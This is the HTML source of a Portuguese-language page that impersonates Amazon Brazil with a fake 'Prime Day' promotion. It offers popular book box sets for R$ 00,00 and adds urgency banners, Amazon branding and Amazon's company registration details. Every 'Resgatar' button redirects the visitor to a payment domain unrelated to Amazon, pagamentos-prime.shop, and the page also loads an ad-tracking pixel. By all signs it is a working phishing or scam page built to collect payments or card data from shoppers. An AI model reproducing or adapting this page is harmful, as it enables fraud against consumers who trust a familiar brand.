<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <script src="js/latest_1.js" async="" defer=""></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Promoção Amazon Prime Day</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: white;
            color: #333;
        }
        header {
            background-color: #232f3e;
            color: white;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 10px 0;
        }
        header img {
            max-height: 30px;
            padding: 10;
        }
         footer img {
             margin-top: 20px;
              margin-bottom: 10px;
            max-height: 30px;
            padding: 10;
        }
        .banner {
            text-align: center;
            margin: 20px 0;
        }
        .banner img {
            max-width: 100%;
             margin-top: -20px;
            height: auto;
        }
        .centered-title {
    text-align: center;
    color:#07A7E2;
    font-size: 1.8em; /* Ajuste o tamanho da fonte conforme necessário */
    margin-top: 15px; /* Ajuste o espaçamento superior conforme necessário */
    font-weight: bold; /* Deixa o texto em negrito */
}
     .centered-title-1 {
    text-align: center;
    color:#232f3e;
    font-size: 1em; /* Ajuste o tamanho da fonte conforme necessário */
    margin-top: -10px; /* Ajuste o espaçamento superior conforme necessário */
    font-weight: bold; /* Deixa o texto em negrito */
}
        .container {
            display: flex;
            justify-content: center;
            flex-wrap: wrap;
            padding: 0px;
            
        }
        .column {
            flex: 1;
            max-width: 45%;
            box-sizing: border-box;
            padding: 5px;
           
        }
        .product {
            background-color: white;
            border: px solid #ddd;
            border-radius: 10px;
            margin-bottom: 10px;
            padding: 0px;
            text-align: center;
            transition: box-shadow 0.3s ease;
        }
        .product:hover {
           
        }
        .product img {
            max-width: 100%;
            height: auto;
        }
        .product h2 {
            font-size: 1em;
            margin: 10px 0;
        }
        .price {
            margin: 10px 0
            ;
        }
        .price-original {
            text-decoration: line-through;
            color: #888;
        }
        .price-promo {
            color: #07A7E2;
            font-weight: bold;
            font-size: 1.4em;
        }
        .buy-button {
    background-color: #ff9900;
    border: none;
    color: white;
    padding: 15px 50px;
    text-transform: uppercase;
    cursor: pointer;
    font-size: 15px;
    margin-top: 0px;
    border-radius: 10px; /* Adiciona bordas arredondadas */
    font-weight: bold; /* Deixa o texto em negrito */
}

        }
        .buy-button:hover {
            background-color: #e68a00;
        }
        footer {
            background-color: #232f3e;
            color: white;
            text-align: center;
            padding: 20px 0;
            margin-top: 20px;
        }
        footer p {
            margin: 5px 0;
        }
        @media (max-width: 768px) {
            .column {
                max-width: 100%;
            }
        }
    </style>
<script async="" defer="" src="js/pixel.js"></script><script async="" defer="" src="js/pixel_1.js"></script><script async="" defer="" src="js/pixel_2.js"></script></head>
<body>

<header>
    <img src="images/amazonlogo.png" alt="Logo">
</header>
<div style="background-color: #ff9900; padding: 10px 0; width: 100%; overflow: hidden; box-shadow: 0 2px 4px rgba(0,0,0,0.1);">
  <div id="info-bar" style="display: flex; justify-content: center; align-items: center; white-space: nowrap; animation: marquee 20s linear infinite;">
    <span style="display: flex; align-items: center; font-size: 16px; color: #ecf0f1; padding: 0 50px; font-weight: bold;">
    
    ÚLTIMAS UNIDADES - RESGATE JÁ!
   
    </span>
  </div>
</div>
<div class="banner">
    <img src="images/B.png" alt="Banner">
</div>
  <h1 class="centered-title">Ofertas Exclusivas Prime Day</h1>
  <h1 class="centered-title-1">O dia mais esperado do ano chegou!</h1>
<div class="container">
    <div class="column">
        <div class="product">
            <img src="images/L2.png" alt="Produto 1">
            <h2>BOX OS BRIDGERTONS + BRINDE EXCLUSIVO</h2>
            <div class="price">
                <span class="price-original">R$ 540,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms11() ">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms11() {
                window.location.href = 'https://pay.pagamentos-prime.shop/1VOvGVXmn6v3D62' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/PS.jpeg" alt="Produto 2">
            <h2>BOX PERCY JACKSON + FUNKO POP</h2>
            <div class="price">
                <span class="price-original">R$ 520,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms10()">resgatar</button>
        </div>
        <script>
            function redirecionarComUtms10() {
                window.location.href = 'https://pay.pagamentos-prime.shop/5pjw3RXJk8NG2lQ' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L4.png" alt="Produto 2">
            <h2>BOX INSTRUMENTOS MORTAIS</h2>
            <div class="price">
                <span class="price-original">R$ 520,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms9()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms9() {
                window.location.href = 'https://pay.pagamentos-prime.shop/q510ZO9j2l4gE9D' + window.location.search;
            }
        </script>
             <div class="product">
            <img src="images/C.jpeg" alt="Produto 7">
            <h2>BOX CASTELO ANIMADO + PELÚCIA</h2>
            <div class="price">
                <span class="price-original">R$ 390,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms8()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms8() {
                window.location.href = 'https://pay.pagamentos-prime.shop/2wq7GrKorDpgBAN' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L1.png" alt="Produto 2">
            <h2>BOX JOGOS VORAZES</h2>
            <div class="price">
                <span class="price-original">R$ 490,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms7()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms7() {
                window.location.href = 'https://pay.pagamentos-prime.shop/JqoR32vVpjA3Vj5' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L9.png" alt="Produto 2">
            <h2>BOX MAZE RUNNER</h2>
            <div class="price">
                <span class="price-original">R$ 430,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms6()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms6() {
                window.location.href = 'https://pay.pagamentos-prime.shop/RmA83EYbqRz3PVp' + window.location.search;
            }
        </script>
        <!-- Adicione mais produtos conforme necessário -->
    </div>
    <div class="column">
        <div class="product">
            <img src="images/HP1.png" alt="Produto 6">
            <h2>BOX HARRY POTTER + EDIÇÃO ESPECIAL</h2>
            <div class="price">
                <span class="price-original">R$ 600,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms5()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms5() {
                window.location.href = 'https://pay.pagamentos-prime.shop/RmA83EYbz5b3PVp' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/pc1%20%281%29.png" alt="Produto 7">
            <h2>BOX HARRY POTTER + EDIÇÃO LINDAZI</h2>
            <div class="price">
                <span class="price-original">R$ 450,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms4()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms4() {
                window.location.href = 'https://pay.pagamentos-prime.shop/xQBPZvNLVlQZmVq' + window.location.search;
            }
        </script>
        
        <div class="product">
            <img src="images/G.jpeg" alt="Produto 7">
            <h2>BOX GAME OF THRONES + FUNKO POP</h2>
            <div class="price">
                <span class="price-original">R$ 499,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms3()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms3() {
                window.location.href = 'https://pay.pagamentos-prime.shop/JqoR32vVOxJ3Vj5' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L8.png" alt="Produto 2">
            <h2>BOX AS CRÔNICAS DE NÁRNIA ESPECIAL</h2>
            <div class="price">
                <span class="price-original">R$ 430,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms2()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms2() {
                window.location.href = 'https://pay.pagamentos-prime.shop/mwK436a7zOxgQ8b' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L10.png" alt="Produto 2">
            <h2>BOX A SELEÇÃO</h2>
            <div class="price">
                <span class="price-original">R$ 690,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms1()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms1() {
                window.location.href = 'https://pay.pagamentos-prime.shop/rn4RgQYDBqogwBV' + window.location.search;
            }
        </script>
        <div class="product">
            <img src="images/L7.png" alt="Produto 2">
            <h2>BOX SHERLOCK HOLMES</h2>
            <div class="price">
                <span class="price-original">R$ 450,00</span><br>
                <span class="price-promo">R$ 00,00</span>
            </div>
            <button class="buy-button" onclick="redirecionarComUtms()">Resgatar</button>
        </div>
        <script>
            function redirecionarComUtms() {
                window.location.href = 'https://pay.pagamentos-prime.shop/nWrxGWeXMLb3654' + window.location.search;
            }
        </script>
        <!-- Adicione mais produtos conforme necessário -->
    </div>
</div>

<footer>
     <img src="images/amazonlogo.png" alt="Logo">
    <p>Selos de segurança</p>
    <p>Políticas de privacidade</p>
    <p>Sua conta</p>
    <p>Frete e prazo de entrega</p>
    <p>Devoluções e reembolsos</p>
    <p>Gerencie seu conteúdo e dispositivos</p>
    <p>Ajuda</p><p></p>
  <br><br>
    
   
    
    
    <p>Amazon Serviços de Varejo do Brasil Ltda.</p><p>
        CNPJ 15.436.940/0001-03</p>
    
</footer>

<script src="js/latest.js" async="" defer=""></script>

<script>
  window.pixelId = "66bad9006d37948f58a4d2c1";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>


<script src="js/latest_1.js" async="" defer=""></script></body></html>